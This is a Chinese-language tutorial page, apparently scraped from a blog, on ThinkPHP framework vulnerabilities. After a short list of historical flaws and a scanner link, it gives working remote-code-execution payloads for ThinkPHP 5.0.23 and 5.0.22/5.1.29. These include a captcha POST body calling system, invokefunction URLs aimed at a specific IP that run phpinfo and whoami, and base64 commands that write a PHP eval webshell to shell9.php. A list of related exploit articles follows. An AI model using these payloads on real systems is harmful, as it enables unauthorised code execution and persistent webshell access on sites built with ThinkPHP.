Thinkphp漏洞
➢ Thinkphp介绍
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持
windows/Unix/Linux等服务器环境。
➢ Thinkphp应用
很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。
➢历史漏洞
ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell
ThinkPHP5_SQL注入漏洞&&敏感信息泄露
ThinkPHP3.2.3_最新版update注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.X_find_select_delete注入
ThinkPHP框架5.0.X_sql注入漏洞分析
ThinkPHP3.X_order_by注入漏洞
ThinkPHP5.X_order_by注入漏洞
ThinkPHP5.X_远程代码执行
➢ Thinkphp特征
➢漏洞检测
https://github.com/Lucifer1993/TPscan
➢漏洞简介( 5.0.23)
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可
以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
➢漏洞利用( (命令执行) )
POST /index.php?s=captcha
Data:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
➢漏洞利用( (命令执行) )
POST /index.php?s=captcha
Data:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=
echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== |
base64 -d > shell9.php
➢漏洞简介( 5.0.22/5.1.29)
其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下
(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
➢漏洞利用(代码执行)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
➢漏洞利用(命令执行)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=whoami
➢漏洞利用(写 webshell)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=echo -n
YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell9.php
Thinkphp漏洞相关推荐
- php %3c0x1a%3e是什么_利用ThinkPHP漏洞扫描攻击
利用ThinkPHP漏洞扫描攻击 115.238.244.112 119.3.90.139 94.191.10.105 POST /index.php/?s=captcha HTTP/1.1 ...
- thinkphp漏洞复现
所有文章,仅供安全研究与学习之用,后果自负! thinkphp漏洞 前言 一.thinkphp-2x-rce 代码执行 0x01 漏洞描述 0x02 影响版本 0x03 漏洞利用 0x04 漏洞修复 ...
- ThinkPHP漏洞总结复现
ThinkPHP漏洞总结 简介 版本 Thinkphp 2.x 任意代码执行漏洞 漏洞原理 复现过程 修复意见 Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 漏洞原理 影响范围 复现 ...
- ThinkPHP漏洞总结(利用)
ThinkPHP介绍 ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从S ...
- thinkphp漏洞_漏洞分析之thinkPHP反序列化:这就是黑客的世界吗
前言 作为一个Web菜鸡,我之前和师傅们参加了红帽杯,奈何只有0输出,当时只知道是thinkphp5.2的反序列化漏洞,但是感觉时间不够了,也就没有继续做下去.只有赛后来查漏补缺了,也借着tp5.2这 ...
- thinkphp漏洞_【组件攻击链】ThinkCMF 高危漏洞分析与利用
一.组件介绍 1.1 基本信息 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架.ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形 ...
- Thinkphp漏洞详解合集
文章目录 Thinkphp6.0.12LTS反序列化漏洞 环境 漏洞分析 thinkphp lang命令执行 环境 影响版本 漏洞分析 漏洞复现 CNVD-2018-24942(t5RCE) 环境 影 ...
- [Vulhub] ThinkPHP漏洞合集
文章目录 ThinkPHP 2.x 任意代码执行漏洞 0x00 漏洞描述 0x01 影响版本 0x02 靶场环境 0x03 漏洞分析 0x04 漏洞复现 0x05 getshell Thinkphp5 ...
- 渗透测试之路:ThinkPHP漏洞复现
1)简介 ThinkPHP是一个免费开源的,快速的,简单的面向对象的国产轻量级PHP开发框架. ThinkPHP遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业级应用开而诞生的,具有 ...
- ThinkPHP漏洞利用
漏洞标志 影响版本 ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 漏洞利用 先查看版本号.在网址上随意输入一个不存在的模块 地址: 可以看到,thin ...
最新文章
- Template Metaprogramming
- web网络图片查看器Android
- 解决linux中tmp目录下的文件被清理的问题
- java爬虫登录_Java爬虫中怎么爬取需要登录的网站
- python汉化 草蟒_草蟒首页、文档和下载 - Python 汉化版
- 利用 adb 对手机进行屏幕分辨率设置
- java实现心型代码
- Laravel 5.5 Eloquent ORM - 快速入门
- 刚刚!核电老将俞培根晋升东方电气集团董事长
- 用户留存分析学习整理
- TensorFlow学习笔记——《TensorFlow技术解析与实战》
- 关于用python实现Windows笔记本自动切换强信号WiFi功能
- 记录一次 Liferay 7.X 中弹出窗口的简单使用
- 千锋逆战班学习第二十五天
- 无Internet访问权限却可以上网
- [亲测可行]Ubuntu16.04+opencv3.4+opencv_contrib+cuda9.0安装
- Photoshop界面字体太小解决方案
- 数据结构之排序-希尔排序
- html编写田字格,canvas画田字格与米字格
- 你的简历真的做的好吗?一起来看看软件测试简历的常见误区
热门文章
- 解决FutureWarning: The default method ‘yw‘ can produce PACF values outside of the [-1,1] interval.
- 旋转(一):旋转矩阵推导
- 塑造客户体验未来的趋势
- 方法、操作、算法和多态性术语的不同意义
- eclipse配置spark开发环境
- 【Matlab水果识别】自助水果超市【含GUI源码 594期】
- 机器学习: 如何防止过拟合
- C语言实现从键盘输入年月日,输出该月的天数
- mongodb aggregate $unwind
- Eslint跳过对某行、某段代码的检查